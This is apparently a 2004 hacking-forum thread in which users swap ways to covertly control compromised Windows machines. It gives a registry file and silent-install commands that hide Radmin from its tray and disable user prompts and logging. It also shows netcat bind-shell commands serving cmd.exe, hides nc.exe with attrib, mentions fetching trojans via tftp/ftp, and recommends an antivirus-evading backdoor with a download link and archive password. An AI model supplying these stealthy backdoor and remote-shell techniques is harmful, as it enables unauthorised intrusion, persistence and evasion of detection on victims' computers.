[night^man]

996633, on Feb 25 2004, 03:44 PM, said:

So, Now I#ve testet Radmin, it's great, but how can I upload the r_server.exe and the two dll's to the remote-computer and then run the server-client???
Is there any prog to upload and run files?

(Can Radmin runned in hidden modus? Because in the Taskbar there is the R symbol)

ya..sure it's can be in hidden mode check this:

1)do a REG file and write this in :
[HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters]
"NTAuthEnabled"=hex:00,00,00,00
"Parameter"=hex:d4,db,5b,ce,7f,cc,6f,7d,0a,c7,e8,68,e8,7f,64,3e
"Port"=hex:f6,09,00,00
"Timeout"=hex:0a,00,00,00
"EnableLogFile"=hex:00,00,00,00
"LogFilePath"="c:\\logfile.txt"
"FilterIp"=hex:00,00,00,00
"DisableTrayIcon"=hex:01,00,00,00
"AutoAllow"=hex:00,00,00,00
"AskUser"=hex:00,00,00,00
"EnableEventLog"=hex:00,00,00,00
2)now start the r_server file like this:
r_server.exe /install /silence
r_server.exe /pass:PASS /port:PORT /save /silence
r_server.exe /start /silence
now radmin started on your PORT and PASS you want in hide mode
njoy
:)

[prog]

from nc you can either

Create a user/pass and start telnet.
tftp/ftp a web downloader, and run
tftp/ftp a trojan

However i dunno if this is nc all together or if its me using dameware and nc. But when I do regular

ftp [ip]

and input the username, it will not request the password. Just sit there, no echo.
However if I

ftp -A [ip]

It allows login

Thought this might help.

[prog]

the nc command?
nc=netcat

or am i just missing something?

[fre4k]

Here the commands for nc

First upload nc in c:\winnt\system32 for example

Then do a hidden attrib at nc with strg +r

site exec attrib +h nc.exe

And at last these command:

strg +r then

nc -L -p anyPORT -d -e cmd.exe

BSP: nc -L -p 666 -d -e cmd.exe

Then connect in a dos box:

nc.exe -vv Ip port [666]



have a nice day ;D

[prog]

why not
nc.exe -L -d -p 666 -e cmd.exe

[usch]

nc.exe -L -d -p 666 -e cmd.exe

if u executed that command on the server u can simply type in your dos prompt at your computer:telnet serverip 666
and if everything was done righty there should be something like that:
C:\winnt\system32
noq u can type in the commands,described some posts above.
if u don`t know how to use dos,u shouldn`t learn exploiting before.
^^

[guufa]

You can try abacab a french backdoor, isn't detected by av.
http://0data.site.vo...lientabacab.htm.

He integrate a AV/FW's killer, a remote shell, you can install a proxy too, and other functions.


Archive's pass:abac

PS: Sorry for my poor English ;)

[radioactive]

http://www.twd-indus...n/downloads.htm
This is not a virus - not a backdoor but still if u use that u will get the full GUI of the slave and do what ever u want - as if ur sitting on the slave computer itself - it will be a bit slow over the internet if using dialup - trial version allows connection for 5 mins - i have tested it on Win2000 98 XP over the LAN - nice to play around - enjoy :lol:

Why under my name a warning sign is coming - what i have done?? I don't want to make junk posts to gain Member status - i just want to be here - i don't mind if I am kept as trial member as long as my interest to know is fulfilled